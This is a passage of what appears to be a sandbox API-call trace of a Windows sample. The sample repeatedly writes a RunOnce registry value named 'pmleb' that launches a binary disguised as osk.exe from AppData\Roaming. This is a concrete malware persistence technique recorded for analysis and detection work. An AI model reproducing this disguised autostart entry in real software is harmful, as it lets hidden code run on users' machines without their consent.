ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.605] SetTimer (hWnd=0x20280, nIDEvent=0x21b0, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b0 [0085.605] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.618] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.618] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.619] KillTimer (hWnd=0x20280, uIDEvent=0x21b0) returned 1 [0085.619] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.619] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.619] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.620] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.620] RegCloseKey (hKey=0x280) returned 0x0 [0085.620] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.620] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.620] SetTimer (hWnd=0x20280, nIDEvent=0x21b1, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b1 [0085.620] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.634] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.634] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.634] KillTimer (hWnd=0x20280, uIDEvent=0x21b1) returned 1 [0085.634] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.635] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.635] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.635] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.635] RegCloseKey (hKey=0x280) returned 0x0 [0085.635] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.636] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.636] SetTimer (hWnd=0x20280, nIDEvent=0x21b2, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b2 [0085.636] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.697] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.697] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.698] KillTimer (hWnd=0x20280, uIDEvent=0x21b2) returned 1 [0085.698] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.698] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.698] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.699] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.699] RegCloseKey (hKey=0x280) returned 0x0 [0085.699] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.699] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0085.699] SetTimer (hWnd=0x20280, nIDEvent=0x21b3, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b3 [0085.699] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.712] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.712] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.713] KillTimer (hWnd=0x20280, uIDEvent=0x21b3) returned 1 [0085.713] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.713] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.714] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.714] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.714] RegCloseKey (hKey=0x280) returned 0x0 [0085.714] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.714] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.714] SetTimer (hWnd=0x20280, nIDEvent=0x21b4, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b4 [0085.714] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.727] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.727] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.728] KillTimer (hWnd=0x20280, uIDEvent=0x21b4) returned 1 [0085.728] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.728] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.728] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.729] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.729] RegCloseKey (hKey=0x280) returned 0x0 [0085.729] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.729] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.729] SetTimer (hWnd=0x20280, nIDEvent=0x21b5, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b5 [0085.729] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.744] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.744] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.745] KillTimer (hWnd=0x20280, uIDEvent=0x21b5) returned 1 [0085.750] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.750] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.750] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.750] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.751] RegCloseKey (hKey=0x280) returned 0x0 [0085.751] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.751] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.751] SetTimer (hWnd=0x20280, nIDEvent=0x21b6, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b6 
[0085.751] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.759] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.759] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.759] KillTimer (hWnd=0x20280, uIDEvent=0x21b6) returned 1 [0085.759] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.760] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.760] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.760] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.760] RegCloseKey (hKey=0x280) returned 0x0 [0085.760] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.760] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.760] SetTimer (hWnd=0x20280, nIDEvent=0x21b7, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b7 [0085.760] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.774] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.774] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.775] KillTimer (hWnd=0x20280, uIDEvent=0x21b7) returned 1 [0085.775] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.775] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.775] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.776] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.776] RegCloseKey (hKey=0x280) returned 0x0 [0085.776] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.776] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.776] SetTimer (hWnd=0x20280, nIDEvent=0x21b8, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b8 [0085.776] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.790] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.790] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.790] KillTimer (hWnd=0x20280, uIDEvent=0x21b8) returned 1 [0085.790] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.791] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.791] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.791] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.791] RegCloseKey (hKey=0x280) returned 0x0 [0085.791] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.792] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.792] SetTimer (hWnd=0x20280, nIDEvent=0x21b9, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b9 [0085.792] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0085.806] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.806] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.806] KillTimer (hWnd=0x20280, uIDEvent=0x21b9) returned 1 [0085.806] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.807] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.807] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.807] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.807] RegCloseKey (hKey=0x280) returned 0x0 [0085.807] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.808] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.808] SetTimer (hWnd=0x20280, nIDEvent=0x21ba, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ba [0085.808] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.822] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.822] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.822] KillTimer (hWnd=0x20280, uIDEvent=0x21ba) returned 1 [0085.822] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.823] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.823] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.823] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.823] RegCloseKey (hKey=0x280) returned 0x0 [0085.824] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.824] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.824] SetTimer (hWnd=0x20280, nIDEvent=0x21bb, uElapse=0xa, lpTimerFunc=0x0) returned 0x21bb [0085.824] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.837] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.837] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.837] KillTimer (hWnd=0x20280, uIDEvent=0x21bb) returned 1 [0085.837] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.838] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.838] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.838] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.838] RegCloseKey (hKey=0x280) returned 0x0 [0085.839] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.839] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.839] SetTimer (hWnd=0x20280, nIDEvent=0x21bc, uElapse=0xa, lpTimerFunc=0x0) returned 0x21bc [0085.839] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.854] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.854] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.855] KillTimer (hWnd=0x20280, uIDEvent=0x21bc) returned 1 [0085.855] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.855] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.855] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.856] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.856] RegCloseKey (hKey=0x280) returned 0x0 [0085.856] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.856] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.856] SetTimer (hWnd=0x20280, nIDEvent=0x21bd, uElapse=0xa, lpTimerFunc=0x0) returned 0x21bd [0085.856] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.868] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.868] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.868] KillTimer (hWnd=0x20280, uIDEvent=0x21bd) returned 1 [0085.869] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.869] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.869] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.869] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.870] RegCloseKey (hKey=0x280) returned 0x0 [0085.870] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.870] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.870] SetTimer (hWnd=0x20280, nIDEvent=0x21be, uElapse=0xa, lpTimerFunc=0x0) returned 0x21be [0085.870] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.884] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.884] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.884] KillTimer (hWnd=0x20280, uIDEvent=0x21be) returned 1 [0085.884] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.885] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.885] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.885] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.885] RegCloseKey (hKey=0x280) returned 0x0 [0085.885] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.886] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.886] SetTimer (hWnd=0x20280, nIDEvent=0x21bf, uElapse=0xa, lpTimerFunc=0x0) returned 0x21bf [0085.886] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.899] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.899] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.899] KillTimer (hWnd=0x20280, 
uIDEvent=0x21bf) returned 1 [0085.900] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.900] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.900] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.901] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.901] RegCloseKey (hKey=0x280) returned 0x0 [0085.901] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.901] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.901] SetTimer (hWnd=0x20280, nIDEvent=0x21c0, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c0 [0085.901] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.915] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.915] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.916] KillTimer (hWnd=0x20280, uIDEvent=0x21c0) returned 1 [0085.916] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.916] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.917] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.917] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.917] RegCloseKey (hKey=0x280) returned 0x0 [0085.917] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.917] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.917] SetTimer (hWnd=0x20280, nIDEvent=0x21c1, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c1 [0085.917] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.930] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.930] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.931] KillTimer (hWnd=0x20280, uIDEvent=0x21c1) returned 1 [0085.931] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.931] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.931] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.932] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.932] RegCloseKey (hKey=0x280) returned 0x0 [0085.932] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.932] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.932] SetTimer (hWnd=0x20280, nIDEvent=0x21c2, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c2 [0085.932] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.963] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.963] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.963] KillTimer (hWnd=0x20280, uIDEvent=0x21c2) returned 1 [0085.963] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
